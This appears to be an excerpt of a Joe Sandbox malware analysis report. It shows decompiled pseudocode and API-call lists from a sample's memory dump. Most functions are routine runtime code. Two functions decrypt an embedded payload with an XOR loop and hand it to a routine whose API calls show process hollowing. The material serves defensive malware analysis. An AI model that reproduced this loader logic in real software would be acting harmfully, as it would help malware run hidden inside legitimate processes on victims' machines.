									__eflags = _t232 - 0x48;
									if(_t232 == 0x48) {
										_t181 = 0x4e;
									}
								}
								L9:
								_t232 = _t181;
								goto L10;
							}
						} else {
							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t232 = 0x20;
							continue;
						}
					}
					L110:
					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
					_pop(_t272);
					 *[fs:eax] = _t272;
					_push(E00409410);
					return E00403EAC(_t282 - 0x28, 2);
				}
			}

















    0x00409161
    0x00409161
    0x00409161
    0x00409162
    0x0040916b
    0x0040917f
    0x004091b5
    0x004091ba
    0x004091bc
    0x004091f2
    0x004091f7
    0x004091f9
    0x0040923b
    0x00409240
    0x00409242
    0x00409282
    0x00409287
    0x00409289
    0x004092c9
    0x0040928b
    0x0040928c
    0x00409291
    0x004092ae
    0x004092b4
    0x004092b4
    0x00409244
    0x00409245
    0x0040924a
    0x00409267
    0x0040926d
    0x0040926d
    0x004091fb
    0x004091fb
    0x00409200
    0x00409217
    0x0040921c
    0x00409202
    0x00409206
    0x0040920b
    0x00409210
    0x00409222
    0x00409226
    0x00409226
    0x004091be
    0x004091be
    0x004091c3
    0x004091c5
    0x004091c5
    0x004091d3
    0x004091d9
    0x004091dd
    0x004091dd
    0x00409181
    0x00409181
    0x00409186
    0x00409188
    0x00409188
    0x00409188
    0x0040918b
    0x0040918f
    0x00409194
    0x00409196
    0x0040919c
    0x004091a0
    0x004091a0
    0x004093d8
    0x004093d8
    0x004093db
    0x004093df
    0x00000000
    0x00000000
    0x00408cdf
    0x00408cdf
    0x00408cea
    0x00408cf1
    0x00408d24
    0x00408d27
    0x00408d2f
    0x00408d32
    0x00408d34
    0x00408d34
    0x00408d34
    0x00408d36
    0x00408d3b
    0x00408d3e
    0x00408d4d
    0x00408d52
    0x00408d55
    0x00408d58
    0x004093c6
    0x004093d2
    0x00000000
    0x004093d7
    0x00408d5e
    0x00408d64
    0x00000000
    0x00000000
    0x00000000
    0x00408de4
    0x00408de5
    0x00408dec
    0x00408df2
    0x00408df6
    0x00408e28
    0x00408df8
    0x00408e10
    0x00408e15
    0x00000000
    0x00000000
    0x00408e33
    0x00408e3b
    0x00408e41
    0x00408e46
    0x00408e4c
    0x00408e52
    0x00408e55
    0x00000000
    0x00000000
    0x00408e60
    0x00408e68
    0x00408e6e
    0x00408e73
    0x00408e79
    0x00408e7f
    0x00408e82
    0x00000000
    0x00000000
    0x00408e8d
    0x00408e95
    0x00408e9e
    0x00408e9f
    0x00408e9f
    0x00408ea2
    0x00408ea8
    0x00408eac
    0x00408eb0
    0x00408eb3
    0x00408ea4
    0x00408ea4
    0x00408ec2
    0x00408ec6
    0x00408ecd
    0x00408ea6
    0x00408edc
    0x00408ee0
    0x00408ee7
    0x00408eec
    0x00408ea4
    0x00000000
    0x00000000
    0x00408ef2
    0x00408ef9
    0x00408efc
    0x00408efd
    0x00408efd
    0x00408f00
    0x00408f13
    0x00408f17
    0x00408f1b
    0x00408f1e
    0x00408f02
    0x00408f02
    0x00408f3b
    0x00408f3e
    0x00408f45
    0x00408f04
    0x00408f04
    0x00408f04
    0x00408f05
    0x00408f62
    0x00408f65
    0x00408f6c
    0x00408f07
    0x00408f07
    0x00408f07
    0x00408f08
    0x00408f77
    0x00408f7b
    0x00408f80
    0x00408f0a
    0x00408f8b
    0x00408f8f
    0x00408f94
    0x00408f99
    0x00408f08
    0x00408f05
    0x00408f02
    0x00000000
    0x00000000
    0x00408f9f
    0x00408fa0
    0x00408fa7
    0x00408fad
    0x00408fb1
    0x0040904e
    0x0040904e
    0x0040904e
    0x00409050
    0x00409052
    0x00000000
    0x00000000
    0x00408fb9
    0x00408fb9
    0x00408fb9
    0x00408fbe
    0x00408fc5
    0x00408fd2
    0x00408fd2
    0x00408fd4
    0x00408fd6
    0x00408fd9
    0x00408fee
    0x00408fee
    0x00408fee
    0x00408ff1
    0x00408ffa
    0x00408ffa
    0x00408ffe
    0x0040904d
    0x0040904d
    0x0040904d
    0x00000000
    0x0040904d
    0x00409000
    0x00409000
    0x00409005
    0x0040900a
    0x0040900c
    0x00409011
    0x00409013
    0x0040903f
    0x0040903f
    0x00000000
    0x0040903f
    0x00409015
    0x00409015
    0x0040901a
    0x0040901f
    0x00409021
    0x00409026
    0x00409028
    0x00000000
    0x00000000
    0x0040902a
    0x0040902a
    0x0040902f
    0x00409034
    0x00409036
    0x0040903b
    0x0040903d
    0x00000000
    0x00000000
    0x00000000
    0x0040903d
    0x00408ff3
    0x00408ff3
    0x00408ff3
    0x00408ff6
    0x00000000
    0x00000000
    0x00408ff8
    0x00000000
    0x00408ff8
    0x00408fdb
    0x00408fdb
    0x00000000
    0x00000000
    0x00408fdd
    0x00408fdd
    0x00408fdd
    0x00408fe0
    0x00409045
    0x00409045
    0x00409048
    0x00409048
    0x0040904a
    0x00000000
    0x0040904a
    0x00408fe2
    0x00408fe2
    0x00408fe2
    0x00408fe5
    0x00000000
    0x00000000
    0x00408fe7
    0x00408fe7
    0x00408fe7
    0x00408fea
    0x00000000
    0x00000000
    0x00408fec
    0x00000000
    0x00408fc7
    0x00408fc7
    0x00408fc9
    0x00408fce
    0x00000000
    0x00408fce
    0x00408fc5
    0x00409058
    0x00409058
    0x0040905c
    0x00409060
    0x00409062
    0x00409065
    0x0040906d
    0x00409071
    0x00409073
    0x00409073
    0x00409073
    0x00409067
    0x00409067
    0x00409067
    0x00409065
    0x00409077
    0x0040907b
    0x0040907d
    0x0040907d
    0x00409084
    0x00409088
    0x0040908b
    0x0040908e
    0x00000000
    0x00000000
    0x00409099
    0x004090a1
    0x004090a7
    0x004090ab
    0x004090ad
    0x004090ad
    0x004090b4
    0x004090b8
    0x004090bc
    0x004090bf
    0x00000000
    0x00000000
    0x004090ca
    0x004090d2
    0x004090d8
    0x004090dc
    0x004090de
    0x004090de
    0x004090e5
    0x004090e9
    0x004090ed
    0x004090f0
    0x00000000
    0x00000000
    0x004090fb
    0x004090fc
    0x00409102
    0x00409106
    0x0040911c
    0x00409120
    0x00409125
    0x00409108
    0x00409108
    0x0040910c
    0x00409111
    0x00409116
    0x00000000
    0x00000000
    0x00409130
    0x00409138
    0x0040913e
    0x00409142
    0x00409144
    0x00409144
    0x0040914b
    0x0040914f
    0x00409153
    0x00409156
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004092d4
    0x004092db
    0x004092df
    0x004092e4
    0x004092eb
    0x004092f1
    0x004092f6
    0x0040930a
    0x0040930e
    0x00409313
    0x0040931e
    0x00409322
    0x00409327
    0x00000000
    0x0040932c
    0x004092f8
    0x004092f8
    0x004092fd
    0x00000000
    0x00000000
    0x004092ff
    0x004092ff
    0x00409304
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00409332
    0x00409332
    0x00409333
    0x00409338
    0x0040933a
    0x00000000
    0x00409358
    0x00409358
    0x00409359
    0x0040935e
    0x0040935e
    0x0040935e
    0x00000000
    0x00409377
    0x00409377
    0x0040939a
    0x0040939a
    0x0040939a
    0x0040939d
    0x0040939f
    0x004093a1
    0x00000000
    0x00000000
    0x004093a3
    0x004093a3
    0x004093a6
    0x0040937c
    0x0040937c
    0x0040937c
    0x00409381
    0x00409388
    0x00409397
    0x00409397
    0x00409397
    0x0040938a
    0x0040938a
    0x00409392
    0x00409392
    0x00000000
    0x00409388
    0x00000000
    0x004093a6
    0x004093a8
    0x004093a8
    0x004093ac
    0x004093af
    0x004093b3
    0x004093b9
    0x004093bc
    0x004093bf
    0x004093c1
    0x004093c1
    0x00000000
    0x00000000
    0x00408d40
    0x00408d40
    0x00408d42
    0x00408d44
    0x00408d47
    0x00408d49
    0x00408d49
    0x00408d47
    0x00408d4b
    0x00408d4b
    0x00000000
    0x00408d4b
    0x00408cf3
    0x00408d04
    0x00408d12
    0x00408d15
    0x00000000
    0x00408d15
    0x00408cf1
    0x004093e5
    0x004093e8
    0x004093f0
    0x004093f3
    0x004093f6
    0x00409408
    0x00409408

    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040D920, Relevance: 6.1, APIs: 4, Instructions: 115
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040C9FC();
							E0040D7EC(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040CA04();
							E0040D7EC(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0040D8C4(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0040D894(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040CA0C();
						E0040D7EC(_v780);
						E0040DB18(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040C598();
				return E0040D7EC(_v776);
			}






















    0x0040d92c
    0x0040d93c
    0x0040d943
    0x0040d943
    0x0040d94e
    0x0040d95c
    0x0040d96b
    0x0040d989
    0x0040d96d
    0x0040d978
    0x0040d978
    0x0040d998
    0x0040d9a4
    0x0040d9a7
    0x0040d9a9
    0x0040d9aa
    0x0040d9ac
    0x0040d9b2
    0x0040d9b4
    0x0040d9c3
    0x0040d9c4
    0x0040d9ce
    0x0040d9cf
    0x0040d9d4
    0x0040d9df
    0x0040d9e0
    0x0040d9ea
    0x0040d9eb
    0x0040d9f0
    0x0040da0b
    0x0040da0d
    0x0040da0e
    0x0040da11
    0x0040da11
    0x0040d9b2
    0x0040da1a
    0x0040da1d
    0x0040da1f
    0x0040da20
    0x0040da26
    0x0040da2c
    0x0040da2e
    0x0040da30
    0x0040da33
    0x0040da36
    0x0040da36
    0x0040da39
    0x00000000
    0x00000000
    0x00000000
    0x0040da39
    0x0040da39
    0x0040da40
    0x0040da4b
    0x0040da53
    0x0040da5a
    0x0040da61
    0x0040da62
    0x0040da67
    0x0040da72
    0x0040da72
    0x0040da80
    0x0040da84
    0x0040da8a
    0x0040da8b
    0x0040da9b

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040B3A0, Relevance: 6.1, APIs: 4, Instructions: 95
    C-Code - Quality: 100%
    			E0040B3A0() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x454738 = 0x409;
				 *0x45473c = 9;
				 *0x454740 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x454738 = _t14;
				}
				if(_t14 != 0) {
					 *0x45473c = _t14 & 0x3ff;
					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x419108, 0x40b4f4, 8 << 2);
				if( *0x4190c0 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x454744 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040B328(__eflags, _t49);
					}
				} else {
					_t20 = E0040B388();
					if(_t20 != 0) {
						 *0x454745 = 0;
						 *0x454744 = 0;
						return _t20;
					}
					E0040B328(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x454744 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x454745 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x454738; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x454745 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















    0x0040b3ac
    0x0040b3b6
    0x0040b3c0
    0x0040b3ca
    0x0040b3d1
    0x0040b3d3
    0x0040b3d3
    0x0040b3db
    0x0040b3e7
    0x0040b3f3
    0x0040b3f3
    0x0040b407
    0x0040b410
    0x0040b4bf
    0x0040b4c4
    0x0040b4c9
    0x0040b4d0
    0x0040b4d5
    0x0040b4d7
    0x0040b4da
    0x0040b4e0
    0x0040b4e2
    0x00000000
    0x0040b4ea
    0x0040b416
    0x0040b416
    0x0040b41d
    0x0040b41f
    0x0040b426
    0x00000000
    0x0040b426
    0x0040b433
    0x0040b443
    0x0040b445
    0x0040b44a
    0x0040b44d
    0x0040b453
    0x0040b455
    0x0040b457
    0x00000000
    0x0040b457
    0x0040b463
    0x0040b468
    0x0040b46e
    0x0040b46e
    0x0040b470
    0x0040b471
    0x0040b472
    0x0040b472
    0x0040b48e
    0x0040b494
    0x0040b499
    0x0040b49e
    0x0040b4a4
    0x0040b4a4
    0x0040b4a8
    0x0040b4ab
    0x0040b4b1
    0x0040b4b3
    0x00000000
    0x00000000
    0x0040b4b5
    0x0040b4b8
    0x0040b4b8
    0x0040b4b9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040b4b9
    0x0040b4a4
    0x0040b4f1
    0x0040b4f1
    0x00000000

    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040152C, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E0040137C(0x4545e4, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









    0x00401530
    0x00401532
    0x00401534
    0x00401536
    0x0040154a
    0x0040154f
    0x00401551
    0x00401555
    0x0040155d
    0x00401563
    0x0040156f
    0x00401574
    0x00401574
    0x00401579
    0x00401582
    0x00401589
    0x00401595
    0x0040159c
    0x00000000
    0x0040159c
    0x00401589
    0x004015a2

    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00405E00, Relevance: 6.0, APIs: 4, Instructions: 11
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





    0x00405e03
    0x00405e0a
    0x00405e0f
    0x00405e15
    0x00405e1a

    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00408B80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x408c5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00403E88(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00403F20( &_v8, 0x408c80);
				} else {
					E00403F20( &_v8, 0x408c74);
				}
				_t32 = E00404348(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E004040F8(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E00408C65);
				return E00403E88( &_v8);
			}













    0x00408b8d
    0x00408b90
    0x00408b92
    0x00408b96
    0x00408b97
    0x00408b9c
    0x00408b9f
    0x00408ba4
    0x00408bb0
    0x00408bbb
    0x00408bc6
    0x00408bcd
    0x00408be6
    0x00408bcf
    0x00408bd7
    0x00408bd7
    0x00408bfa
    0x00408c13
    0x00408c22
    0x00408c28
    0x00408c43
    0x00408c43
    0x00408c28
    0x00408c4a
    0x00408c4d
    0x00408c50
    0x00408c5d

    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0041844E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
    C-Code - Quality: 50%
    			E0041844E() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t31;
				signed int _t34;
				void* _t38;
				void* _t39;
				void* _t45;
				void* _t51;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(_t45);
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xffffffd0;
				GetSystemInfo( &_v40);
				_t34 = 0;
				_t31 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t34 == 0x20) {
						_t34 = 0;
					}
					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
					_t34 = _t34 + 1;
					_t15 = _t15 + 1;
					_t31 = _t31 - 1;
				} while (_t31 != 0);
				L5:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t38);
				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
				goto L5;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418465
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00418450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
    C-Code - Quality: 53%
    			E00418450() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t30;
				signed int _t33;
				void* _t37;
				void* _t38;
				intOrPtr _t42;
				void* _t47;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t42;
				GetSystemInfo( &_v40);
				_t33 = 0;
				_t30 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t33 == 0x20) {
						_t33 = 0;
					}
					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
					_t33 = _t33 + 1;
					_t15 = _t15 + 1;
					_t30 = _t30 - 1;
				} while (_t30 != 0);
				L4:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t37);
				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
				goto L4;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
